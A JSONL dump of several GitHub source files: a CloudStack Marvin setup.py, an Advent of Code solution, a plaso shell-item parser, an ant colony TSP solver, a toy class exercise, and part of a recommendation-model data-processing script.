+{"seq_id":"33780711425","text":"try:\n from setuptools import setup, find_packages\nexcept ImportError:\n try:\n from distribute_setup import use_setuptools\n use_setuptools()\n from setuptools import setup, find_packages\n except ImportError:\n raise RuntimeError(\"python setuptools is required to build Marvin\")\n\n\nVERSION = \"4.19.0.0\"\n\nsetup(name=\"Marvin\",\n version=VERSION,\n description=\"Marvin - Python client for Apache CloudStack\",\n author=\"The Apache CloudStack Team\",\n author_email=\"dev@cloudstack.apache.org\",\n maintainer=\"The Apache CloudStack Team\",\n maintainer_email=\"dev@cloudstack.apache.org\",\n long_description=\"Marvin is the Apache CloudStack python \"\n \"client written around the unittest framework\",\n platforms=(\"Any\",),\n url=\"https://builds.apache.org/job/cloudstack-marvin/\",\n packages=[\"marvin\", \"marvin.cloudstackAPI\",\n \"marvin.lib\", \"marvin.config\", \"marvin.sandbox\",\n \"marvin.sandbox.advanced\", \"marvin.sandbox.advancedsg\",\n \"marvin.sandbox.basic\"],\n license=\"LICENSE.txt\",\n install_requires=[\n \"mysql-connector-python <= 8.0.30\",\n \"requests >= 2.2.1\",\n \"paramiko >= 1.13.0\",\n \"nose >= 1.3.3\",\n \"ddt >= 0.4.0\",\n \"pyvmomi >= 5.5.0\",\n \"netaddr >= 0.7.14\",\n \"dnspython\",\n \"ipmisim >= 0.7\",\n \"pytz\",\n \"retries\",\n \"PyCrypt\",\n \"kubernetes\",\n \"urllib3\",\n \"setuptools >= 40.3.0\"\n ],\n py_modules=['marvin.marvinPlugin'],\n zip_safe=False,\n entry_points={\n 'nose.plugins': ['marvinPlugin = marvin.marvinPlugin:MarvinPlugin'],\n 'console_scripts': ['marvincli = marvin.deployAndRun:main']\n },\n )\n","repo_name":"apache/cloudstack","sub_path":"tools/marvin/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":1557,"dataset":"github-code","pt":"32"}
+{"seq_id":"19202127125","text":"file = open('puzzle/07.in', 'r')\ncontent = file.read().splitlines()\n\n# part 1\nmatryoshka = {'shiny gold'}\nbf_length = 0\nwhile bf_length != len(matryoshka):\n bf_length = len(matryoshka)\n for expression in content:\n contained_colors = set()\n for sentence in expression.split('contain')[1].split(','):\n contained_colors.add(sentence[3:sentence.index('bag') - 1])\n if set.intersection(matryoshka, contained_colors) != set():\n matryoshka.add(expression.split('contain')[0][:-6])\nmatryoshka.remove('shiny gold')\nprint(len(matryoshka))\n\n# part 2\nparents = {}\nfor expression in content:\n if expression.split('bags')[0][:-1] not in matryoshka:\n if expression.split('contain ')[1] == 'no other bags.':\n parents[expression.split('bags')[0][:-1]] = 0\n else:\n inside = expression.split('contain')[1].split(',')\n value = []\n for bag in inside:\n value.extend([bag[1], bag[3:bag.index('bag')-1]])\n parents[expression.split('bags')[0][:-1]] = value\nint_parents = {}\nfor bag in parents:\n if isinstance(parents[bag], int):\n int_parents[bag] = parents[bag]\n\nwhile int_parents != parents:\n for color in parents:\n if color not in int_parents:\n for bag in range(1, len(parents[color]), 2):\n if parents[color][bag] not in int_parents:\n break\n else:\n value = 0\n for bag in range(0, len(parents[color]), 2):\n value += int(parents[color][bag])*(1 + parents[parents[color][bag+1]])\n parents[color] = int_parents[color] = value\nprint(parents['shiny gold'])\n","repo_name":"michalwasik/Advent-of-Code","sub_path":"2020/07.py","file_name":"07.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"17029632021","text":"import pyfwsi\n\nfrom plaso.events import shell_item_events\nfrom plaso.lib import eventdata\nfrom plaso.winnt import shell_folder_ids\n\n\nif pyfwsi.get_version() < '20140714':\n raise ImportWarning(\n u'Shell item support fuctions require at least pyfwsi 20140714.')\n\n\nclass ShellItemsParser(object):\n \"\"\"Parses for Windows NT shell items.\"\"\"\n\n NAME = 'shell_items'\n\n def __init__(self, origin):\n \"\"\"Initializes the parser.\n\n Args:\n origin: A string containing the origin of the event (event source).\n \"\"\"\n super(ShellItemsParser, self).__init__()\n self._origin = origin\n self._path_segments = []\n\n def _ParseShellItem(self, parser_context, shell_item):\n \"\"\"Parses a shell item.\n\n Args:\n parser_context: A parser context object (instance of ParserContext).\n shell_item: the shell item (instance of pyfwsi.item).\n \"\"\"\n path_segment = None\n\n if isinstance(shell_item, pyfwsi.root_folder):\n description = shell_folder_ids.DESCRIPTIONS.get(\n shell_item.shell_folder_identifier, None)\n\n if description:\n path_segment = description\n else:\n path_segment = u'{{{0:s}}}'.format(shell_item.shell_folder_identifier)\n\n elif isinstance(shell_item, pyfwsi.volume):\n if shell_item.name:\n path_segment = shell_item.name\n elif shell_item.identifier:\n path_segment = u'{{{0:s}}}'.format(shell_item.identifier)\n\n elif isinstance(shell_item, pyfwsi.file_entry):\n long_name = u''\n localized_name = u''\n file_reference = u''\n for exension_block in shell_item.extension_blocks:\n if isinstance(exension_block, pyfwsi.file_entry_extension):\n long_name = exension_block.long_name\n localized_name = exension_block.localized_name\n file_reference = exension_block.file_reference\n if file_reference:\n file_reference = u'{0:d}-{1:d}'.format(\n file_reference & 0xffffffffffff, file_reference >> 48)\n\n fat_date_time = exension_block.get_creation_time_as_integer()\n if fat_date_time:\n event_object = shell_item_events.ShellItemFileEntryEvent(\n fat_date_time, eventdata.EventTimestamp.CREATION_TIME,\n shell_item.name, long_name, localized_name, file_reference,\n self._origin)\n parser_context.ProduceEvent(event_object, parser_name=self.NAME)\n\n fat_date_time = exension_block.get_access_time_as_integer()\n if fat_date_time:\n event_object = shell_item_events.ShellItemFileEntryEvent(\n fat_date_time, eventdata.EventTimestamp.ACCESS_TIME,\n shell_item.name, long_name, localized_name, file_reference,\n self._origin)\n parser_context.ProduceEvent(event_object, parser_name=self.NAME)\n\n fat_date_time = shell_item.get_modification_time_as_integer()\n if fat_date_time:\n event_object = shell_item_events.ShellItemFileEntryEvent(\n fat_date_time, eventdata.EventTimestamp.MODIFICATION_TIME,\n shell_item.name, long_name, localized_name, file_reference,\n self._origin)\n parser_context.ProduceEvent(event_object, parser_name=self.NAME)\n\n if long_name:\n path_segment = long_name\n elif shell_item.name:\n path_segment = shell_item.name\n\n elif isinstance(shell_item, pyfwsi.network_location):\n if shell_item.location:\n path_segment = shell_item.location\n\n if path_segment is None and shell_item.class_type == 0x00:\n # TODO: check for signature 0x23febbee\n pass\n\n if path_segment is None:\n path_segment = u'UNKNOWN: 0x{0:02x}'.format(shell_item.class_type)\n\n self._path_segments.append(path_segment)\n\n def CopyToPath(self):\n \"\"\"Copies the shell items to a path.\n\n Returns:\n A Unicode string containing the converted shell item list path or None.\n 
\"\"\"\n if not self._path_segments:\n return\n\n return u', '.join(self._path_segments)\n\n def Parse(self, parser_context, byte_stream, codepage='cp1252'):\n \"\"\"Parses the shell items from the byte stream.\n\n Args:\n parser_context: A parser context object (instance of ParserContext).\n byte_stream: a string holding the shell items data.\n codepage: Optional byte stream codepage. The default is cp1252.\n \"\"\"\n self._path_segments = []\n shell_item_list = pyfwsi.item_list()\n shell_item_list.copy_from_byte_stream(byte_stream, ascii_codepage=codepage)\n\n for shell_item in shell_item_list.items:\n self._ParseShellItem(parser_context, shell_item)\n","repo_name":"cvandeplas/plaso","sub_path":"plaso/parsers/shared/shell_items.py","file_name":"shell_items.py","file_ext":"py","file_size_in_byte":4583,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"}
+{"seq_id":"17904132363","text":"\"\"\"\nCode Reference : https://github.com/Akavall/AntColonyOptimization\n\"\"\"\nimport random as rn\nimport numpy as np\nfrom numpy.random import choice as np_choice\nimport random\nimport pandas as pd\nimport operator\nimport time\n\nclass AntColony:\n def __init__(self, distances, n_ants, n_best, n_iterations, decay, alpha=1, beta=1):\n \"\"\"\n Args:\n distances (2D numpy.array): Square matrix of distances. Diagonal is assumed to be np.inf.\n n_ants (int): Number of ants running per iteration\n n_best (int): Number of best ants who deposit pheromone\n n_iteration (int): Number of iterations\n decay (float): Rate it which pheromone decays. The pheromone value is multiplied by decay, so 0.95 will lead to decay, 0.5 to much faster decay.\n alpha (int or float): exponenet on pheromone, higher alpha gives pheromone more weight. Default=1\n beta (int or float): exponent on distance, higher beta give distance more weight. Default=1\n\n Example:\n ant_colony = AntColony(german_distances, 100, 20, 2000, 0.95, alpha=1, beta=2) \n \"\"\"\n self.distances = distances\n self.pheromone = np.ones(self.distances.shape) / len(distances)\n self.all_inds = range(len(distances))\n self.n_ants = n_ants\n self.n_best = n_best\n self.n_iterations = n_iterations\n self.decay = decay\n self.alpha = alpha\n self.beta = beta\n\n \n def run(self):\n shortest_path = None\n all_time_shortest_path = (\"placeholder\", np.inf)\n for i in range(self.n_iterations):\n all_paths = self.gen_all_paths()\n self.spread_pheronome(all_paths, self.n_best, shortest_path=shortest_path)\n shortest_path = min(all_paths, key=lambda x: x[1])\n #print(\"Length of the Shortest path during \"+str(i)+\" iteration is \"+str(shortest_path[1]))\n if shortest_path[1] < all_time_shortest_path[1]:\n all_time_shortest_path = shortest_path \n self.pheromone * self.decay \n return all_time_shortest_path\n\n def spread_pheronome(self, all_paths, n_best, shortest_path):\n sorted_paths = sorted(all_paths, key=lambda x: x[1])\n for path, dist in sorted_paths[:n_best]:\n for move in path:\n self.pheromone[move] += 1.0 / self.distances[move]\n\n def gen_path_dist(self, path):\n total_dist = 0\n for ele in path:\n total_dist += self.distances[ele]\n return total_dist\n\n def gen_all_paths(self):\n all_paths = []\n for i in range(self.n_ants):\n path = self.gen_path(0)\n all_paths.append((path, self.gen_path_dist(path)))\n return all_paths\n\n def gen_path(self, start):\n path = []\n visited = set()\n visited.add(start)\n prev = start\n for i in range(len(self.distances) - 1):\n move = self.pick_move(self.pheromone[prev], self.distances[prev], visited)\n path.append((prev, move))\n prev = move\n visited.add(move)\n path.append((prev, start)) # going back to where we started \n return path\n\n def pick_move(self, pheromone, dist, visited):\n pheromone = np.copy(pheromone)\n pheromone[list(visited)] = 0\n\n row = pheromone ** self.alpha * (( 1.0 / dist) ** self.beta)\n\n norm_row = row / row.sum()\n move = np_choice(self.all_inds, 1, p=norm_row)[0]\n return move\n\n\ndef read_data(data_file):\n df = pd.read_csv(data_file) \n nodes = []\n for i in range(len(df['pairs'])):\n sp = df['pairs'][i].split(' ')\n x = float(sp[1])\n y = float(sp[2])\n nodes.append([x, y])\n return nodes\n\n \ndef eucledian_distance(a, b):\n ret = 0\n for i in range(len(a)):\n ret += (a[i] - b[i]) ** 2\n return ret ** 0.5\n\n\ndef main(data_file):\n start = time.time()\n\n beta = 2\n q0 = 0.95\n alpha = 0.1\n peta = 0.1\n n_ants = 20 #No of Ants\n 
m_ants = 5\n iterations = 100\n\n nodes = read_data(data_file)\n\n arrs = [[np.inf]*len(nodes)]*len(nodes)\n\n for i in range(len(nodes)):\n for j in range(i+1, len(nodes)):\n arrs[i][j] = eucledian_distance(nodes[i], nodes[j])\n arrs[j][i] = arrs[i][j]\n\n distances = np.array(arrs)\n\n ant_colony = AntColony(distances, n_ants, m_ants, iterations, q0, alpha, beta)\n\n shortest_path = ant_colony.run()\n print('Shortest Path Length', str(shortest_path[1]))\n\n time_lapse = time.time() - start\n print('Time lapsed', time_lapse)\n\nif __name__=='__main__':\n main(data_file)","repo_name":"Shraddha2702/Summer_AI","sub_path":"TravelingSalesman/Algorithms/.ipynb_checkpoints/AntColonyAlgo-checkpoint.py","file_name":"AntColonyAlgo-checkpoint.py","file_ext":"py","file_size_in_byte":4681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
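A minimal end-to-end run of the AntColony class above on a hand-written 4-node matrix (the distances are arbitrary; the diagonal is np.inf, as the docstring requires):

import numpy as np

distances = np.array([[np.inf, 2, 2, 5],
                      [2, np.inf, 4, 8],
                      [2, 4, np.inf, 1],
                      [5, 8, 1, np.inf]])

ant_colony = AntColony(distances, n_ants=3, n_best=2, n_iterations=50,
                       decay=0.95, alpha=1, beta=2)
path, length = ant_colony.run()
print(path, length)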
+{"seq_id":"3985351358","text":"class Person:\n def __init__(self, name):\n self.name = name\n\n def __str__(self):\n return self.name\n\n def push_name(self, person):\n person.name = self.name\n\n def attack(self, person):\n name = str(person)\n for _ in str(name):\n if _ in self.name.lower() + self.name.upper():\n name = name.replace(_, '')\n person.name = name\n\n def show_name(self):\n print(f\"Hello, I am {self.name}\")\n\n\nclass Destroyer:\n def __init__(self, chars, replace_chars='#'):\n self.chars = chars\n self.replace_chars = replace_chars\n\n def __call__(self, person):\n name = str(person)\n repl_list = []\n for _ in str(name):\n if _ in self.chars.lower() + self.chars.upper():\n name = name.replace(_, self.replace_chars)\n repl_list.append(f\"'{_.lower()}'\")\n repl_list = list(set(repl_list))\n repl_list.sort()\n print(f\"Destroyed: {', '.join(set(repl_list))} from {name}'s name.\")\n person.name = name\n return person\n\n\nif __name__ == '__main__':\n john = Person(\"John\")\n alberta = Person(\"Alberta\")\n print(john, alberta)\n v_kill = Destroyer(\"aeiou\")\n v_kill(john)\n print(john, alberta)\n alpha_kill = Destroyer(\"\".join(chr(i) for i in range(65, 91)), \"\")\n print(john, alberta)\n alpha_kill(john)\n print(john, alberta)\n alberta.push_name(john)\n print(john, alberta)\n caitlin = Person(\"Caitlin\")\n john.attack(caitlin)\n print(caitlin)\n v_kill(caitlin).show_name()\n alberta.show_name()\n","repo_name":"berson969/InterviewTests","sub_path":"bykov_decision.py","file_name":"bykov_decision.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"38520362131","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 8 11:34:08 2019\n\n@author: gzs13133\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport lightgbm as lgb\nimport matplotlib.pylab as plt\n\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.linear_model import LogisticRegression\n\nimport os \nos.chdir('C://Users//GZS13133//intern//data//data_with_hist')\nimport keras.backend as K\nfrom base_structure import draw\nfrom model import ccBaseModel, ccDINModelwithOneHist, ccdeepFM\nfrom data_process import judge_multi_feature, multi_column_info, one_column_inde_info, train_test_split, \\\n sample_weight_generate, nlp_weight_dict, nlp_wor2vec_dict, gametype_word2evc_list, \\\n train_test_split_all, column_count_bar, data_build\n\n\n'''数据类型\nsn, gametype, label, \nandroid_app: 1001 types, 250 length, sn\nios_app: 1001 types, 8 length, sn\nmobile_model: 1001 types, 20 length, sn \ninterest_gametype: : 24 types, 9 length, sn\ngametype_label: 1000 types, 20 length, game\ngametype_hotrank_by_aid_cnt: 51 types, 1 length, game \ngametype_hotrank_by_uid_cnt: 51 types, 1 length, game\ngametype_id: 127 types, 1 length, same as gametype\n'''\n\n'''建模的两种思路\n1.将有长度的seqence看成是multi-hot编码的特征输入到DIN模型\n2.将有长度的seqence看成是多个hist序列进行attention求和处理 (不可行,因为特征空间不同,可以引入transformer结构)\n(理解成其他不同的历史行为对用户的推荐产生不一样的影响)\n本质上两者的区别在于是否有attention\n'''\n\n\n############ 数据读取\ncolumns = 'sn, gametype, label, android_app, ios_app, mobile_model, \\\ninterest_gametype, gametype_label, gametype_hotrank_by_aid_cnt, \\\ngametype_hotrank_by_uid_cnt, gametype_id'\n\n#data_route = 'temp'\n#data_route = 'temp_05_09'\ndata_route = 'temp_05_22_train'\ndata_all = pd.read_csv(data_route, header=None, sep='\\t', low_memory=False)\ndata_all.columns = columns.split(', ')\n\n#gametype & gametype_id 一致\n#a, b = list(data['gametype'].values),list(data['gametype_id'].values)\n#sum([1*(a[i]==b[i]) for i in range(len(a))])\ndata_all = data_all.iloc[:,:-1]\n \ndata_all = data_all.fillna('-1')\n\ndata_route = 'temp_05_22_test'\ndata_all_1 = pd.read_csv(data_route, header=None, sep='\\t', low_memory=False)\ndata_all_1.columns = columns.split(', ')\ndata_all_1 = data_all_1.iloc[:,:-1]\ndata_all_1 = data_all_1.fillna('-1')\n\ndata_alll = pd.concat([data_all, data_all_1])\ndata, data_in = train_test_split_all(data_alll, test_num=150000)\ndel data_alll, data_all, data_all_1\n#data_all_with_hist = data_all[data_all['interest_gametype'] != '-1']\n#data_all_without_hist = data_all[data_all['interest_gametype'] == '-1']\n\n#data_all = pd.read_csv('C:/Users/GZS13133/intern/data/csv_data/data_train_all.csv', low_memory=False)\n#data_in = pd.read_csv('C:/Users/GZS13133/intern/data/csv_data/data_test_all.csv', low_memory=False)\n\ndata_all = pd.read_csv('temp_hist_0610', low_memory=False)\n\ndata_all.columns = columns.split(', ')\ndata_all = data_all.iloc[:,:-1] \ndata_all = data_all.fillna('-1')\ndata_all = data_all[data_all['gametype'] != -1]\ndata_all_hist = data_all[data_all['interest_gametype'] != '-1']\ndata_all_hist.to_csv('temp_hist_0610', header=True, index=False)\n#train_num = 5000000\n#data_all = data_build(data_all, train_num, app_minus_inclued=False, sep='::')\ncolumn_count_bar(data_all_hist, 'gametype', 'All')\n\ndata = pd.read_csv('temp_train_0610_100w', low_memory=False)\ndata_in = pd.read_csv('temp_test_0610_1w', low_memory=False)\ndata_all = pd.concat([data, data_in])\n\ndata_temp = data_build(data_all, 800000)\ndata, data_in = train_test_split_all(data_temp, 
test_num=150000)\n#data.to_csv('temp_train_0627_400w', header=True, index=False)\n#data_in.to_csv('temp_test_0627_15w', header=True, index=False)\ndel data_all, data_temp\n\n\n#不同gametype下的1-0比例不一致,需要先进行分析\ndef fun1(x):\n return sum(x==1)/sum(x==0)\ndef fun2(x):\n return sum(x==1)\ndef fun3(x):\n return sum(x==0)\ndef fun4(x):\n return sum(x==1)/len(x)\ndef fun5(x, total=len(data)):\n return len(x)/total\n\ngametype_ratio = data.groupby('gametype').agg({'label':[fun1, fun2, fun3, fun4, fun5]})\ngametype_ratio.columns = ['label_1/0_rate', 'label_1_num', 'label_0_num', 'label_1_ratio', 'gametype_ratio']\n\n#gametype:[pos_ratio, gametype_ratio]\ngametype_rate_dict = {}\nfor i in zip(gametype_ratio.index, gametype_ratio.iloc[:,3].values, gametype_ratio.iloc[:,4].values):\n gametype_rate_dict[i[0]] = [i[1], i[2]]\n\nsample_nums, train_prop = len(data), 0.97\n#data = data_all\n#del data_all\ntrain_num = int(sample_nums)\n#data = data_build(data_all, sample_nums, gametype_rate_dict)\n#data = data_build(data_all_with_hist, sample_nums, app_minus_inclued=False)\n#613229个sn,即用户;48个gametype\n#len(set(list(data['sn'].values))) \n#temp_0 = data.groupby('sn').agg(len)\n\n\n############ 数据预处理\ndef entropy(label):\n \n temp_1 = np.sum([label == 1]) / len(label)\n temp_2 = 1 - temp_1\n entropy = -(temp_1*np.log(temp_1) + temp_2*np.log(temp_2))\n \n return entropy\n\n#max:0.6931471805599453\nentropy(np.array(data['label'].values)) # 0.6197236875877505\ntemp =data.groupby('gametype_hotrank_by_uid_cnt').agg({'label':entropy})\nnp.sum(temp['label'].values)/len(temp) # 0.40144343228980817\ntemp =data.groupby('gametype_hotrank_by_aid_cnt').agg({'label':entropy})\nnp.sum(temp['label'].values)/len(temp) # 0.4163850320997233\n\ngametype_num = len(set(data['gametype']))\n#发现有个含有-1,可以填充;有个9022的,出现了一个子label,即变短了,也可以填充。\ngametype_label_sp = judge_multi_feature(data, 'gametype', 'gametype_label')\n\n###### game的feature_list生成 \n#生成对应的单长度序列(one:gametype_hotrank_by_aid_cnt & gametype_hotrank_by_uid_cnt),作为两个独立的特征\nhotrank_aid_num, hotrank_aid_list, hotrank_aid_dict = one_column_inde_info(data, 'gametype_hotrank_by_aid_cnt')\nhotrank_uid_num, hotrank_uid_list, hotrank_uid_dict = one_column_inde_info(data, 'gametype_hotrank_by_uid_cnt')\n\n#或者多长度序列(multi:gametype_label)\ngametype_label_num, gametype_label_len, gametype_dict, gametype_label_list, gametype_label_dict, _ = multi_column_info(data, 'gametype_label', 'gametype', sep='::')\n\n#nlp特征\nr1 = 'p2'\nr2 = 'dout2'\n\ngametype_nlp_weight_dict = nlp_weight_dict(r1, gametype_dict)\nword2vec = nlp_wor2vec_dict(r2)\n\nword2vec_list = gametype_word2evc_list(gametype_nlp_weight_dict, word2vec, gametype_num+1)\ndel word2vec\n\n###### sn的feature_list生成 \nsn_num = len(set(data['sn']))\n#一致性检查,发现很多sn下对应multi特征并不一样,但是只需要找到其中最长的作为其特征表示即可\nsn_android_app_sp = judge_multi_feature(data, 'sn', 'android_app')\nsn_ios_app_sp = judge_multi_feature(data, 'sn', 'ios_app')\nsn_mobile_model_sp = judge_multi_feature(data, 'sn', 'mobile_model')\nsn_interest_gametype_sp = judge_multi_feature(data, 'sn', 'interest_gametype')\n\nandroid_app_num, android_app_len, sn_dict, android_app_list, android_app_dict, _ = multi_column_info(data, 'android_app', 'sn', sep='::')\nios_app_num, ios_app_len, _, ios_app_list, ios_app_dict, _ = multi_column_info(data, 'ios_app', 'sn', sep='::')\nmobile_model_num, mobile_model_len, _, mobile_model_list, mobile_model_dict, _ = multi_column_info(data, 'mobile_model', 'sn', sep='::')\ninterest_gametype_num, interest_gametype_len, _, interest_gametype_list, 
interest_gametype_dict, tr_list = multi_column_info(data, 'interest_gametype', 'sn', gametype_dict=gametype_dict, sep='::')\n\n\n###### model输入生成\n### train准备\nsn_list = list(data['sn'].apply(lambda x:sn_dict[x]).values)\ngametype_list = list(data['gametype'].apply(lambda x:gametype_dict[x]).values)\n#以interest作为hist(其他也转化hist备用)\nhist_list = [interest_gametype_list[i] for i in sn_list]\nhist_last_sequence_list = [tr_list[0][i] for i in sn_list]\npos = [tr_list[1][i] for i in sn_list]\nneg = [tr_list[2][i] for i in sn_list]\nandroid_hist_list = [android_app_list[i] for i in sn_list]\nios_hist_list = [ios_app_list[i] for i in sn_list]\nmobile_hist_list = [mobile_model_list[i] for i in sn_list]\n\nlabel = np.array(list(data['label'].values))\n#根据gametype下的gametype比例以及0-1比例设置sample_weight\nsample_weight_gametype_and_label = sample_weight_generate(gametype_rate_dict)\n\nsample_weight = []\nfor i in range(len(data)):\n temp = str(data['gametype'].iloc[i]) + str(data['label'].iloc[i])\n sample_weight.append(sample_weight_gametype_and_label[temp]) \nsample_weight = np.array(sample_weight)\n \n#构造训练集和测试集\ntrain_sample_index, test_sample_index = train_test_split(data, train_num, gametype_rate_dict)\nsample_weight_train = sample_weight[train_sample_index]\n\n# one_hist\n#同分布\nx_all = list(zip(sn_list, gametype_list, hotrank_aid_list, hotrank_uid_list, hist_list))\nx_all = np.array(x_all)\nx_train = x_all[train_sample_index].tolist()\nx_train = [list(i) for i in list(zip(*x_train))]\nx_eval = x_all[test_sample_index].tolist()\nx_eval = [list(i) for i in list(zip(*x_eval))]\ncc_train_sample = [x_train, label[train_sample_index]]\ncc_eval_sample = [x_eval, label[test_sample_index]]\n\n#尽量均衡\neval_bal_nums = 90000\n\n#data_all_1_with_hist = data_all_1[data_all_1['interest_gametype'] != '-1']\n#data_all_1_without_hist = data_all_1[data_all_1['interest_gametype'] == '-1']\n#diff_list = list(set(data_all_1['sn']).difference(set(data['sn']))) \n#in_list = list(set(sn_list))\n#in_index = [i for i in range(len(data_all_1)) if data_all_1['sn'].iloc[i] in in_list] \n#\n#temp_ratio = 1/len(gametype_rate_dict)\n#gametype_rate_dict_balance = {}\n#for i in gametype_rate_dict.keys():\n# gametype_rate_dict_balance[i] = [0.5, temp_ratio]\n# \n#data_in = data_build(data_all_1_with_hist, eval_bal_nums, gametype_rate_dict_balance)\n#del data_all_1, data_all_1_with_hist, data_all_1_without_hist\n\n_, hotrank_aid_list_in, _ = one_column_inde_info(data_in, 'gametype_hotrank_by_aid_cnt', base_dict=hotrank_aid_dict)\n_, hotrank_uid_list_in, _ = one_column_inde_info(data_in, 'gametype_hotrank_by_uid_cnt', base_dict=hotrank_uid_dict)\n_, _, _, gametype_label_list_in, _, _ = multi_column_info(data_in, 'gametype_label', 'gametype', maxlen=gametype_label_len, dict_base=gametype_label_dict)\n\n_, _, sn_dict_in, android_app_list_in,_, _ = multi_column_info(data_in, 'android_app', 'sn', maxlen=android_app_len, dict_base=android_app_dict, sep='::')\n_, _, _, ios_app_list_in, _, _ = multi_column_info(data_in, 'ios_app', 'sn', maxlen=ios_app_len, dict_base=ios_app_dict, sep='::')\n_, _, _, mobile_model_list_in, _, _ = multi_column_info(data_in, 'mobile_model', 'sn', maxlen=mobile_model_len, dict_base=mobile_model_dict, sep='::')\n_, _, _, interest_gametype_list_in, _, tr_list_in = multi_column_info(data_in, 'interest_gametype', 'sn', maxlen=interest_gametype_len, gametype_dict=gametype_dict, sep='::')\n\nsn_list_in = list(data_in['sn'].apply(lambda x:sn_dict[x] if x in sn_dict.keys() else 1).values)\ngametype_list_in = 
list(data_in['gametype'].apply(lambda x:gametype_dict[x] if x in gametype_dict.keys() else 1).values)\nhist_list_in = [interest_gametype_list_in[sn_dict_in[i]] for i in data_in['sn']]\nhist_last_sequence_list_in = [tr_list_in[0][sn_dict_in[i]] for i in data_in['sn']]\npos_in = [tr_list_in[1][sn_dict_in[i]] for i in data_in['sn']]\nneg_in = [tr_list_in[2][sn_dict_in[i]] for i in data_in['sn']]\n\nlabel_eval = np.array(list(data_in['label'].values))\nlabel_rand = np.zeros(len(label))\nlabel_eval_rand = np.zeros(len(label_eval))\n\n#length = interest_gametype_len*interest_gametype_len\n#auxiliary_index_ltr = np.array([np.tril(np.ones(interest_gametype_len, dtype='int32')) for i in range(len(sn_list))]).reshape((-1, length))\n#auxiliary_index_i = np.array([np.eye(interest_gametype_len, dtype='int32') for i in range(len(sn_list))]).reshape((-1, length))\n#auxiliary_index_ltr_in = np.array([np.tril(np.ones(interest_gametype_len, dtype='int32')) for i in range(len(sn_list_in))]).reshape((-1, length))\n#auxiliary_index_i_in = np.array([np.eye(interest_gametype_len, dtype='int32') for i in range(len(sn_list_in))]).reshape((-1, length))\n\n\nx_train = [sn_list, gametype_list, hotrank_aid_list, hotrank_uid_list, hist_list]\ncc_train_sample = [x_train, label, label_rand]\nx_eval = [sn_list_in, gametype_list_in, hotrank_aid_list_in, hotrank_uid_list_in, hist_list_in]\ncc_eval_sample = [x_eval, label_eval, label_eval_rand]\n\nx_train_tr = [sn_list, gametype_list, hotrank_aid_list, hotrank_uid_list, hist_list, hist_last_sequence_list, pos, neg]\ncc_train_sample_tr = [x_train_tr, label, label_rand]\nx_eval_tr = [sn_list_in, gametype_list_in, hotrank_aid_list_in, hotrank_uid_list_in, hist_list_in, hist_last_sequence_list_in, pos_in, neg_in]\ncc_eval_sample_tr = [x_eval_tr, label_eval, label_eval_rand]\n\n# multi_hist\n#same distribution as train\nx_all_multi = list(zip(sn_list, gametype_list, hotrank_aid_list, hotrank_uid_list, hist_list, android_hist_list, ios_hist_list, mobile_hist_list))\nx_all_multi = np.array(x_all_multi)\nx_train_multi = x_all_multi[train_sample_index].tolist()\nx_train_multi = [list(i) for i in list(zip(*x_train_multi))]\nx_eval_multi = x_all_multi[test_sample_index].tolist()\nx_eval_multi = [list(i) for i in list(zip(*x_eval_multi))]\ncc_train_multi_sample = [x_train_multi, label[train_sample_index]]\ncc_eval_multi_sample = [x_eval_multi, label[test_sample_index]]\n\n#balanced\nx_train_multi = [sn_list, gametype_list, hotrank_aid_list, hotrank_uid_list, hist_list, android_hist_list, ios_hist_list, mobile_hist_list]\ncc_train_multi_sample = [x_train_multi, label]\n\nandroid_hist_list_in = [android_app_list_in[sn_dict_in[i]] for i in data_in['sn']]\nios_hist_list_in = [ios_app_list_in[sn_dict_in[i]] for i in data_in['sn']]\nmobile_hist_list_in = [mobile_model_list_in[sn_dict_in[i]] for i in data_in['sn']]\n\nx_eval_multi = [sn_list_in, gametype_list_in, hotrank_aid_list_in, hotrank_uid_list_in, hist_list_in, android_hist_list_in, ios_hist_list_in, mobile_hist_list_in]\ncc_eval_multi_sample = [x_eval_multi, label_eval]\n\n\n### Model parameters\n#Simple-rule baseline: use the train distribution to predict test\ndef fun1(x):\n return sum(x==1)/len(x)\n\ndata_dict = {}\ntemp = data.groupby('gametype').agg({'label':fun1})\ntemp.columns = ['label_1_ratio']\nfor i in zip(temp.index, temp['label_1_ratio']):\n data_dict[i[0]] = i[1]\n\ny_pred = []\nfor i in data_in['gametype']:\n if i in data_dict.keys():\n y_pred.append(data_dict[i])\n else:\n y_pred.append(0)\n \nroc_auc_score(data_in['label'], y_pred) #0.5779539111727456\n#column_count_bar(data_in, 'gametype', 
t='test')\n#column_count_bar(data, 'gametype', t='train')\n'''\n###### Plot the comparison figures\n\ni = 0\nfor use_Activa in use_Activas:\n# draw_epoch(cc_DIN_One[i].auc_val, 'One'+use_Activa, batch_size, train_num, record_num, i)\n# draw_epoch(cc_DIN_Multi[i].auc_val, 'Multi'+use_Activa, batch_size, train_num, record_num, i)\n draw(cc_DIN_One[i].auc_val, cc_DIN_Multi[i].auc_val, train_num, batch_size, record_num, use_Activa, i+1) \n i += 1\n\ni = 0 \nOne_Dataframe = []\nMulti_Dataframe = []\nfor use_Activa in use_Activas:\n One_dict = {'epoch_1': cc_DIN_One[i].auc_val_item[0], 'epoch_2': cc_DIN_One[i].auc_val_item[1], 'epoch_3': cc_DIN_One[i].auc_val_item[2]}\n temp_One = pd.DataFrame(One_dict)\n temp_One.index = cc_DIN_One[i].item_val \n One_Dataframe.append(temp_One)\n \n Multi_dict = {'epoch_1': cc_DIN_Multi[i].auc_val_item[0], 'epoch_2': cc_DIN_Multi[i].auc_val_item[1], 'epoch_3': cc_DIN_Multi[i].auc_val_item[2]}\n temp_Multi = pd.DataFrame(Multi_dict)\n temp_Multi.index = cc_DIN_Multi[i].item_val \n Multi_Dataframe.append(temp_Multi)\n \n i += 1\n\n \n############ Too much data, so train in blocks\n#block_size = 10\n#block_num = sample_nums // 